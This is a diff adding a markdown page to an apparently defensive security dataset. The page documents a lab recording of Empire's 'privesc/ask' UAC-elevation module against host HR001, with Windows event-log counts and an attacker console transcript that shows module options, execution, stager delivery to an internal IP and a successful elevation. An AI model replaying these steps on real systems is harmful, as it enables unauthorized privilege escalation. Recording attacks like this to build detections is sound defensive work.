a/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md new file mode 100644 index 00000000..44c68fbe --- /dev/null +++ b/small_datasets/windows/privilege_escalation/bypass_user_account_control_T1088/empire_ask.md @@ -0,0 +1,133 @@ +# Empire Ask + +Leverages Start-Process' -Verb runAs option inside a YES-Required loop to prompt the user for a high integrity context before running the agent code. +UAC will report Powershell is requesting Administrator privileges. Because this does not use the BypassUAC DLLs, it should not trigger any AV alerts. + +## Technique(s) ID + +T1088 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_ask.tar.gz](./empire_ask.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18183600 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 214 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 14 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 82 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 79 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 48 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 14 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 9 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 475 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 455 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 237 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 75 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 22 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 192 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule privesc/ask +(Empire: powershell/privesc/ask) > info + + Name: Invoke-Ask + Module: powershell/privesc/ask + NeedsAdmin: False + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + Jack64 + +Description: + Leverages Start-Process' -Verb runAs option inside a YES- + Required loop to prompt the user for a high integrity + context before running the agent code. UAC will report + Powershell is requesting Administrator privileges. Because + this does not use the BypassUAC DLLs, it should not trigger + any AV alerts. + +Comments: + https://github.com/rapid7/metasploit- + framework/blob/master/modules/exploits/windows/local/ask.rb + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Proxy False default Proxy to use for request (default, none, + or other). + Agent True H3DKB8SA Agent to run module on. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + +(Empire: powershell/privesc/ask) > set Listener https +(Empire: powershell/privesc/ask) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 2 +[*] Tasked agent H3DKB8SA to run module powershell/privesc/ask +(Empire: powershell/privesc/ask) > Job started: PDY4F2 +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent TKV35P8X checked in +[+] Initial agent TKV35P8X from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to TKV35P8X at 10.0.10.103 +[*] Successfully elevated! + + +(Empire: powershell/privesc/ask) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 18:37:11 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 18:37:10 https + +(Empire: agents) > +```